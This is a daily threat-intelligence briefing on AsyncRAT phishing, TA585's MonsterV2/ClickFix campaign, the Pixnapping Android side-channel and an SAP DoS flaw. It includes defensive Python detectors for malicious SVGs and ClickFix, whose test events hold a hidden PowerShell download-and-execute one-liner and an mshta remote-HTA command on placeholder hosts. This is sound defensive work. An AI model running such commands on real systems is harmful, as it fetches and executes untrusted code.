Daily Threat Briefing
Diamond Trail

Cyware Daily Threat Intelligence, October 14, 2025


Order in the court! Attackers send Spanish, court-themed phishing emails posing as the Bogotá Municipal Civil Court with an SVG attachment that triggers a multi-stage infection when clicked. The chain drops an HTA and injects AsyncRAT into a trusted Windows process.

TA585 runs its own infrastructure to deliver email attacks and deploy MonsterV2 — a RAT, stealer, and loader. They use the “ClickFix” trick to bait victims into running PowerShell, avoid CIS countries, and sell MonsterV2 on cybercrime forums.

Pixnapping, an Android GPU side-channel attack linked to "GPU.zip", abuses rendering/compression behaviour and semi-transparent activities to extract pixel data, stealing 2FA codes, Google Maps timelines, and other sensitive info in under 30 seconds without any special permissions.

Top Malware Reported in the Last 24 Hours

AsyncRAT deployment via judicial phishing

Hackers use court-themed phishing emails in Spanish, impersonating the Bogotá Municipal Civil Court, to target Colombian users. The phishing email includes an SVG attachment that triggers a multi-stage infection chain when clicked, leading to the download of a malicious HTA file. The HTA file executes a Visual Basic script that downloads and decodes additional payloads, ultimately injecting AsyncRAT into a trusted Windows process. AsyncRAT gathers system details, avoids detection using anti-analysis techniques, and exfiltrates data via a TLS-encrypted channel.
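The chain above starts with an SVG that only becomes dangerous because SVG is an XML document a browser will happily run script from. The following Python triage routine is an added example for mail-gateway or sandbox use and is not part of the Cyware briefing or of any vendor's tooling; the two sample SVGs are constructed, and the domain names are placeholders. It flags the features that let an SVG attachment act as a script host: inline `<script>`, `on*` event handlers, `javascript:` URLs, `<foreignObject>` wrapping HTML, and links or image references to external hosts.

```python
"""Static triage of SVG e-mail attachments (constructed defender example)."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field


@dataclass
class SvgTriage:
    findings: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def _local(name: str) -> str:
    # Strip the XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'
    return name.rsplit("}", 1)[-1].lower()


def triage_svg(data: bytes) -> SvgTriage:
    """Return the script-capable features found in one SVG attachment."""
    result = SvgTriage()
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # A file that claims to be SVG but does not parse is itself worth a look.
        result.findings.append(f"malformed XML: {exc}")
        return result

    for elem in root.iter():
        tag = _local(elem.tag)
        if tag == "script":
            result.findings.append("inline <script> element")
        if tag == "foreignobject":
            result.findings.append("<foreignObject> (HTML content inside SVG)")
        for attr, value in elem.attrib.items():
            aname = _local(attr)          # handles xlink:href as well as href
            low = value.strip().lower()
            if aname.startswith("on"):
                result.findings.append(f"<{tag}> has event handler {aname}=")
            if aname == "href":
                if low.startswith("javascript:"):
                    result.findings.append(f"<{tag}> href is a javascript: URL")
                elif re.match(r"^(https?|ftp)://", low):
                    result.findings.append(f"<{tag}> references external URL {value.strip()}")
                elif low.startswith("data:") and ";base64," in low:
                    result.findings.append(f"<{tag}> embeds a base64 data URI")
    return result


# Constructed samples: a plain logo and a lure that redirects on open.
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
    b'<circle cx="50" cy="50" r="40" fill="#1e88e5"/>'
    b'<text x="20" y="55">Logo</text></svg>'
)

SUSPICIOUS_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" '
    b'xmlns:xlink="http://www.w3.org/1999/xlink" onload="init()">'
    b'<script><![CDATA[ function init(){ '
    b'window.location = "https://lure.example.invalid/ticket" } ]]></script>'
    b'<a xlink:href="https://lure.example.invalid/ticket">'
    b'<text x="10" y="20">Ver documento</text></a></svg>'
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        verdict = triage_svg(blob)
        print(label, "->", "SUSPICIOUS" if verdict.suspicious else "clean")
        for f in verdict.findings:
            print("   ", f)
```

The routine deliberately reports external `href` references even though an SVG that loads a remote image can be legitimate; for an attachment arriving from an unknown sender, any outbound reference is enough to route the message to a sandbox rather than the inbox.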

TA585 uses novel web injection to deliver MonsterV2 malware

TA585 is a newly identified threat actor that manages its entire attack chain, including infrastructure, email delivery, and malware installation. MonsterV2 malware acts as a RAT, stealer, and loader, capable of exfiltrating sensitive data, enabling remote desktop access, and executing additional payloads. TA585 avoids infecting systems in Commonwealth of Independent States (CIS) countries and uses MonsterV2, which is sold on cybercriminal forums. TA585 employs the ClickFix technique, in which malicious scripts prompt users to execute PowerShell commands that deliver the malware.
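ClickFix leaves a distinctive trace on the endpoint: the user pastes a command into the Run dialog or a terminal, so a script host (PowerShell, cmd, mshta) appears as a child of explorer.exe or a browser and carries download and window-hiding switches. The detector below is an added example written for this briefing, not TA585 tradecraft or any vendor's rule; the process-creation events are constructed in a Sysmon-like shape, and the hostnames are placeholders. It scores each event on well-known command-line indicators and only alerts when an interactive parent and at least two indicators coincide, which keeps scheduled management scripts out of the alert queue.

```python
"""ClickFix-style process-creation detection (constructed defender example)."""
from __future__ import annotations

import ntpath
import re

# Parents from which a human, not a service, would launch a script host.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line indicators commonly combined in pasted one-liners.
INDICATORS = {
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded-command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "execution-policy-bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "download-cradle": re.compile(
        r"\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest"
        r"|downloadstring|curl|wget)\b", re.I),
    "remote-url": re.compile(r"https?://", re.I),
}


def score_event(ev: dict) -> dict | None:
    """Return an alert record for one process-creation event, or None."""
    parent = ntpath.basename(ev["ParentImage"]).lower()
    image = ntpath.basename(ev["Image"]).lower()
    if image not in SCRIPT_HOSTS:
        return None
    cmd = ev["CommandLine"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    interactive = parent in INTERACTIVE_PARENTS

    if interactive and len(hits) >= 2:
        reason = "interactive parent with evasion/download switches"
    elif image == "mshta.exe" and "remote-url" in hits:
        # mshta fetching a remote HTA is rare enough to flag on its own.
        reason = "mshta launched with a remote URL"
    else:
        return None
    return {"User": ev["User"], "Parent": parent, "Image": image,
            "indicators": hits, "reason": reason}


def detect_clickfix(events: list[dict]) -> list[dict]:
    return [a for a in (score_event(ev) for ev in events) if a]


# Constructed Sysmon-like events: one benign shell, one ClickFix paste,
# one management-agent script, one browser-spawned mshta.
EVENTS = [
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c '
                    '"iex (irm https://verify-captcha.example.invalid/check)"'},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\inventory.ps1"},
    {"User": "CORP\\carol",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://lure.example.invalid/fix.hta"},
]

if __name__ == "__main__":
    for alert in detect_clickfix(EVENTS):
        print(alert["User"], alert["Image"], alert["reason"], alert["indicators"])
```

The management-agent event carries a genuine indicator (execution-policy bypass) but is not alerted because its parent is a service; in production the same split is usually expressed as an allow-list of known automation parents rather than a hard-coded set of interactive ones.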

Top Vulnerabilities Reported in the Last 24 Hours

Pixnapping vulnerability steals 2FA codes

A vulnerability called "Pixnapping" affects Android devices from Google and Samsung and can be used to steal sensitive data such as 2FA codes and Google Maps timelines without the user's knowledge. Pixnapping bypasses browser mitigations and targets Android APIs and hardware side-channels, allowing malicious apps to capture 2FA codes in under 30 seconds. The attack leverages Android's rendering pipeline and semi-transparent activities to extract pixel data from victim apps, even without special permissions. The vulnerability is linked to a side-channel known as GPU.zip, which exploits GPU compression features combined with Android's window blur API.

SAP NetWeaver vulnerability enables DoS attacks

A newly disclosed vulnerability (CVE-2025-42902) in SAP NetWeaver AS ABAP and ABAP Platform allows unauthenticated attackers to crash server processes by sending corrupted SAP Logon or Assertion Tickets. Rated Medium severity with a CVSS score of 5.3, the flaw stems from a NULL pointer dereference that causes memory corruption and a DoS condition. SAP has released patches and advisory notes to address the issue and urges administrators to apply the updates immediately.
